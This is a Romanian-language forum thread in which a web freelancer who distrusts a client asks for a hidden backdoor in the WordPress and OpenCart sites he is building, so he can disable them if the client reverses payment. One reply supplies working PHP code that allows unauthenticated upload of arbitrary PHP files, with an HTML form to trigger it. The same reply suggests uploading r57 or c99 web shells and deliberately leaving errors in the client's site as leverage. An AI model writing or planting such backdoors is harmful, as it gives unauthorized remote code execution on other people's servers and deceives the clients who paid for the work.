Caut un programator/hacker/altceva....

[enzoloco]

Salutare...

Urmeaza sa ma apuc de lucru la 2 situri pentru un tip din state. Nimic complicat, doar o instalare de cms (un Wordpress si un Opencart), plus thema si adaugat continut.

Chestia este ca nu am incredere in individ, iar plata se va face prin PayPal. Avand in vedere ca am mai auzit situatii cand dupa o anumita perioada clientul a cerut banii inapoi, chiar daca jobul a fost facut corespunzator (iar paypal i-a trimis inapoi), incerc sa ma protejez.

Prin urmare, am nevoie de o portita de acces la situri, ca sa le pot scoate din uz, in caz ca se va intampla asa ceva. Aici intervii tu (programator/hacker/altceva...).

Daca ma poti ajuta, hai sa vb mai multe prin PM.

Mc,
Sebi.

[Andretti]

Portita nu rezolva problema atat timp cat fisierele site-urilor au ajuns la el si nu sunt criptate. Le va instala pe un alt server si pentru cativa $, un pakistanez il va scapa de portite . O varianta ar fi sa apelezi la un freelancer care presteaza pe Upwork sau alt site de freelancing, astfel vei fi asigurat in schimbul unui comision de ~20%.
Vezi si escrow.com sau paysafeescrow.com ale caror oferte suna destul de bine.

[enzoloco]

Probabil ca asa o sa fac pana la urma. Vroiam sa fac o romaneasca si sa evit plata taxei catre Upwork.
Oricum, mc de sfat.
PS: la cine cauta backdoor Wordpress pe Google...nu functioneaza metoda care apare prima acolo.

[C. Andrei]

Salut.

Într-unul din fişierele php din site pui scriptul:

Cod PHP:

<?php
if(isset($_GET['filename'], $_FILES, $_FILES['file'], $_FILES['file']['name']))
{
    echo @file_put_contents($_GET['filename'].'.php', file_get_contents($_FILES['file']['tmp_name'])) ? 'done' : 'ops';
    exit();
}
?>

Apoi, tu, o să foloseşti într-un fişier html simplu din calculator:

Cod HTML:

<form action="http://site.ro/fisierul-in-care-ai-pus-scriptul.php?filename=numele-noului-fisier-incarcat-fara-extensie" method="post" enctype="multipart/form-data">
<input type="file" name="file" />
<button>Go</button>
</form>

După încărcarea fişierului, accesezi site.ro/numele-noului-fisier-incarcat-fara-extensie.php

Poţi să încarci un shell ca r57 sau c99, dar îl poate detecta dacă serverul are antivirus. Poţi să-ţi faci propriul script dacă te pricepi puţin.

Chiar şi aşa, nimic nu este nedetectabil. Atât timp cât are acces la site, se poate spune că e al lui şi poate face ce vrea în el. Deci poate să-ţi scoată toate nebuniile.

Sfatul meu:

1. Pune scriptuleţul de mai sus.
2. Nu lucra fără avans.
3. Lasă erori în site. Un client care vede erori, percepe site-ul ca având probleme mari. Asta nu e o scuză să nu-ţi dea banii. Să-ţi dea banii şi apoi rezolvi şi erorile. Nu e cazul să-i spui că e vorba de 5 minute.

[enzoloco]

......

I-am propus la om doua modalitati sa ma plateasca. Acum astept sa vad ce accepta.
Oricum, multumesc de script/sfaturi, sper sa nu fiu nevoit sa-l folosesc.